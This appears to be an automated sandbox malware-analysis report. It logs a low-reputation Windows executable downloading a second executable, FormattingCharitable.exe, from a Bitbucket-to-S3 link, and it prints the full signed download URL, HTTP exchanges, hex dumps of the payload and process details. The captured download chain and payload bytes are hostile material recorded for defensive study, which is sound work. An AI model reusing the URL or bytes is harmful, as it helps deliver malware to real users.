                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Host: bitbucket.org
                                                                                                                                                                    2024-12-23 07:04:33 UTC5946INHTTP/1.1 302 Found
                                                                                                                                                                    Date: Mon, 23 Dec 2024 07:04:33 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Server: AtlassianEdge
                                                                                                                                                                    Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNRVK3O6C&Signature=bByUD0dwbg83H%2B08dW7zc8pOm%2Bg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJGMEQCIC%2B3%2BjjbUGy0cjpzRRt6zZkEP8eYcNsEXxJyxzBfB3lyAiBIwHqx1SbPwC93UpRITG%2FtrJmfMbZ%2FMXMhi%2BrpeiLhTSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMr97ZQWydwtjVD%2FpUKoQCHlbL64aNAUs4s7esfnGXOd9hXvgq4lUh%2FQ0cD%2FYV5YaiDhEKUfk%2B7GlLTWJfer66qWqqXLx8kitt6%2FA4KK5y64dXWwliu0m0tn1smPd2eoWfQIpk9bYGZwtZB5Scx2vR942g3DzN%2Fvdodbo3w6cqKqQy2ODgJOCBPHZ9P1ANP6B%2BNTBekl2XQwIqFwe7DJSORVZm7%2BEwOihmeCtNTLNto5dobnF5VOueL3lrsMTg7mCaNjr9mVsieDw%2FsO3a%2Fxh3Dx8zzj57LdQ%2FRCMdgUookY1HthLgxHwTapScSAJbiw0Tz0v3em5jIi5Jfz4z0KsfJ9sVcTEzP9i1MdEYNBll3KE8eNIw7ZCkuwY6ngGd2muSZEx%2BEhQWHxRfS%2FkoWFVkYiveDA%2FCxx59WBWRi1RllYutEaisKs85SZO4fX2Jcmo [TRUNCATED]
                                                                                                                                                                    Expires: Mon, 23 Dec 2024 07:04:33 GMT
                                                                                                                                                                    Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                    X-Used-Mesh: False
                                                                                                                                                                    Vary: Accept-Language, Origin
                                                                                                                                                                    Content-Language: en
                                                                                                                                                                    X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                    X-Dc-Location: Micros-3
                                                                                                                                                                    X-Served-By: d9bfadc713c0
                                                                                                                                                                    X-Version: c9b3998323c0
                                                                                                                                                                    X-Static-Version: c9b3998323c0
                                                                                                                                                                    X-Request-Count: 4203
                                                                                                                                                                    X-Render-Time: 0.04418206214904785
                                                                                                                                                                    X-B3-Traceid: 01c036bc3e9e4a8e88a6851f2eba33b0
                                                                                                                                                                    X-B3-Spanid: 357918763abe2afb
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    Content-Security-Policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.se [TRUNCATED]
                                                                                                                                                                    X-Usage-Quota-Remaining: 999075.054
                                                                                                                                                                    X-Usage-Request-Cost: 937.80
                                                                                                                                                                    X-Usage-User-Time: 0.022875
                                                                                                                                                                    X-Usage-System-Time: 0.005259
                                                                                                                                                                    X-Usage-Input-Ops: 0
                                                                                                                                                                    X-Usage-Output-Ops: 0
                                                                                                                                                                    Age: 0
                                                                                                                                                                    X-Cache: MISS
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-Xss-Protection: 1; mode=block
                                                                                                                                                                    Atl-Traceid: 01c036bc3e9e4a8e88a6851f2eba33b0
                                                                                                                                                                    Atl-Request-Id: 01c036bc-3e9e-4a8e-88a6-851f2eba33b0
                                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                    Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                    Server-Timing: atl-edge;dur=153,atl-edge-internal;dur=3,atl-edge-upstream;dur=151,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    9192.168.2.104976452.217.18.1404437200C:\Users\user\Desktop\Yh6fS6qfTE.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-23 07:04:35 UTC1354OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNRVK3O6C&Signature=bByUD0dwbg83H%2B08dW7zc8pOm%2Bg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJGMEQCIC%2B3%2BjjbUGy0cjpzRRt6zZkEP8eYcNsEXxJyxzBfB3lyAiBIwHqx1SbPwC93UpRITG%2FtrJmfMbZ%2FMXMhi%2BrpeiLhTSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMr97ZQWydwtjVD%2FpUKoQCHlbL64aNAUs4s7esfnGXOd9hXvgq4lUh%2FQ0cD%2FYV5YaiDhEKUfk%2B7GlLTWJfer66qWqqXLx8kitt6%2FA4KK5y64dXWwliu0m0tn1smPd2eoWfQIpk9bYGZwtZB5Scx2vR942g3DzN%2Fvdodbo3w6cqKqQy2ODgJOCBPHZ9P1ANP6B%2BNTBekl2XQwIqFwe7DJSORVZm7%2BEwOihmeCtNTLNto5dobnF5VOueL3lrsMTg7mCaNjr9mVsieDw%2FsO3a%2Fxh3Dx8zzj57LdQ%2FRCMdgUookY1HthLgxHwTapScSAJbiw0Tz0v3em5jIi5Jfz4z0KsfJ9sVcTEzP9i1MdEYNBll3KE8eNIw7ZCkuwY6ngGd2muSZEx%2BEhQWHxRfS%2FkoWFVkYiveDA%2FCxx59WBWRi1RllYutEaisKs85SZO4fX2JcmoM7yMSgbDsoQ0cWoQJiuLny%2BOgtUxL0Kt2wR5hwGCVr [TRUNCATED]
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                    2024-12-23 07:04:35 UTC554INHTTP/1.1 200 OK
                                                                                                                                                                    x-amz-id-2: djsLGeQE4jl88BZlBRpGpdORRyW8HGbYRMev4vswzwz/ykpv71J1ehM//ynwGDAPkO+Zjph5ep4=
                                                                                                                                                                    x-amz-request-id: MV63YDRKHN6GTVRD
                                                                                                                                                                    Date: Mon, 23 Dec 2024 07:04:36 GMT
                                                                                                                                                                    Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                                    ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                    x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                                    Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                                    Content-Length: 1325507
                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-23 07:04:35 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                                                    2024-12-23 07:04:35 UTC470INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                                                    Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                                                    2024-12-23 07:04:36 UTC16384INData Raw: 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1 83 e0 01 40 f6 c1 10 74 03 83 c0 03 ff 75 bc 8b d1 c1 e0 0b
                                                                                                                                                                    Data Ascii: P0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX@tu
                                                                                                                                                                    2024-12-23 07:04:36 UTC1024INData Raw: 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20
                                                                                                                                                                    Data Ascii: : stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"File: error,
                                                                                                                                                                    2024-12-23 07:04:36 UTC16384INData Raw: 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72
                                                                                                                                                                    Data Ascii: : can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttr
                                                                                                                                                                    2024-12-23 07:04:36 UTC1024INData Raw: 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be 9a 03 0a 41 5a ff 28 18 ab ae 7f 5c 61 89 8b 2c 70 a5 3f ba
                                                                                                                                                                    Data Ascii: 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07z~k\SAZ(\a,p?
                                                                                                                                                                    2024-12-23 07:04:36 UTC1749INData Raw: db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5 17 88 f3 36 b1 99 69 06 9b 17 05 9b 1a 85 7c 67 d3 a2 60 d3
                                                                                                                                                                    Data Ascii: /od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz6i|g`
                                                                                                                                                                    2024-12-23 07:04:36 UTC16384INData Raw: 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61 a4 ec e5 78 e8 c7 05 e3 38 8e 38 c6 a8 27 a8 7b 12 3b 66 6e
                                                                                                                                                                    Data Ascii: AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hzax88'{;fn
                                                                                                                                                                    2024-12-23 07:04:36 UTC1024INData Raw: 7c 06 85 ec d9 47 19 9c dc b2 0a 72 1a 0d 00 b0 32 01 6d 31 02 97 6a 00 04 11 04 5d 2c 74 1a 05 df 84 0d 40 45 75 21 95 55 16 52 54 50 05 ad 9d de 40 d3 1e 3a 43 53 99 b5 af 34 50 64 20 8b 5e 55 11 55 d6 5e 6c 00 20 f0 e5 dc 62 ce 88 4f a1 e0 1d 9e b4 f7 8d 55 e4 f2 fa 0a 0a dc e2 aa ee 2d 2e 87 01 a8 fe ee 0d 00 c4 1f 5d fc 19 55 d5 14 7c f2 0c b7 fc 3f 51 e2 7f f0 e4 69 4a ab ac a2 52 2e 8f b2 ef 91 01 90 63 84 f5 e3 a9 67 00 e3 22 f0 fa b1 95 71 39 ee 66 bd 68 34 00 5c 77 f2 58 a0 73 73 b2 29 31 23 9f 0e 25 17 53 44 6a 31 65 e7 e4 52 79 41 16 15 e4 36 d5 41 bc 16 16 ef b1 28 28 2c a2 fc 82 42 ca e5 f5 a0 4e ca 79 7b a9 d3 40 89 b5 32 01 5c c7 f3 b8 3e e7 f2 b8 6f 08 25 4c df 44 99 5d 27 53 f5 cf fb d0 f1 3b 9e a0 da 47 87 50 21 1b 80 74 df 40 4a ce cc
                                                                                                                                                                    Data Ascii: |Gr2m1j],t@Eu!URTP@:CS4Pd ^UU^l bOU-.]U|?QiJR.cg"q9fh4\wXss)1#%SDj1eRyA6A((,BNy{@2\>o%LD]'S;GP!t@J
                                                                                                                                                                    2024-12-23 07:04:36 UTC16384INData Raw: f5 b4 fa 8d a5 b4 7a de 52 da b4 64 1d ed dc e6 44 7b 5d f7 aa 65 f0 54 59 08 3e ea 08 62 05 f5 1b 26 e2 bd f7 de a3 d1 a3 47 b7 66 00 76 b2 9a e3 41 40 78 11 d0 33 cc 93 37 74 bf fd 95 1b fb 76 0e bf 71 d0 3d 5f de fc c2 fd 74 f3 90 fb e9 c6 e7 ef fb ec 86 41 f7 06 dc 32 a8 43 7f 5e 46 06 11 ff 2b 32 00 d5 a1 83 07 d5 84 0d f6 ad 3c 3c d0 df 3e e9 bb 19 de 3a d7 d0 7e ee 67 c7 07 bd f6 eb 0f 77 be f6 cd f9 af 97 13 d1 32 66 ce 85 33 a7 66 7d 7c 0a 85 a2 0f 57 dd 00 20 51 a0 15 83 eb 00 70 ee 06 c9 03 15 01 dd 39 a0 c9 08 84 52 78 84 8d b0 f0 96 bb f3 04 d3 10 98 06 40 2a 9d 59 a1 25 58 24 a0 04 3d 78 81 24 80 46 03 c0 e0 71 99 78 2e 76 d8 be 03 e4 f6 da 2a 65 02 36 f5 9b 4e ee 3c 1e e1 13 44 69 6c 0e f0 1e 6d f3 65 43 97 63 00 ac 8c 80 95 09 d0 c5 1f 88
                                                                                                                                                                    Data Ascii: zRdD{]eTY>b&GfvA@x37tvq=_tA2C^F+2<<>:~gw2f3f}|W Qp9Rx@*Y%X$=x$Fqx.v*e6N<DilmeCc


                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:02:04:05
                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\Yh6fS6qfTE.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Yh6fS6qfTE.exe"
                                                                                                                                                                    Imagebase:0xf20000
                                                                                                                                                                    File size:2'968'064 bytes
                                                                                                                                                                    MD5 hash:6CB8E80FE23740DFF137816A6572A5BA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:5
                                                                                                                                                                    Start time:02:04:37
                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 1928
                                                                                                                                                                    Imagebase:0xcc0000
                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Reset < >
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000003.1514698464.0000000001456000.00000004.00000020.00020000.00000000.sdmp, Offset: 01456000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_3_1456000_Yh6fS6qfTE.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b10b6c1848a9081a2b2e12ff5fb2f3aab8af210ada974a4b67ea859181cd15c4
                                                                                                                                                                      • Instruction ID: 507b2145592ae7b46ae6cd971c7ec9670507a48c5ff95870f31e1b4282535933
                                                                                                                                                                      • Opcode Fuzzy Hash: b10b6c1848a9081a2b2e12ff5fb2f3aab8af210ada974a4b67ea859181cd15c4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A2223A284E7C55FD7038B705C6A650BFB56E6320470ECACFC8C58F4A3E719994AD322
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000003.1514698464.0000000001456000.00000004.00000020.00020000.00000000.sdmp, Offset: 01456000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_3_1456000_Yh6fS6qfTE.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3b9e9fc36637c87a7b6fb6d305cffd9fdcad4e6c5f6e5bd50737d573ab3e0826
                                                                                                                                                                      • Instruction ID: 4cb9db305936c1e08aaa2527d457837056ac47ee228966495df5f6188bafa45c
                                                                                                                                                                      • Opcode Fuzzy Hash: 3b9e9fc36637c87a7b6fb6d305cffd9fdcad4e6c5f6e5bd50737d573ab3e0826
                                                                                                                                                                      • Instruction Fuzzy Hash: 544159300092D68BD757CF38CA98696BFA1BF03218B1C07EAD9C18F6A3D3755545C356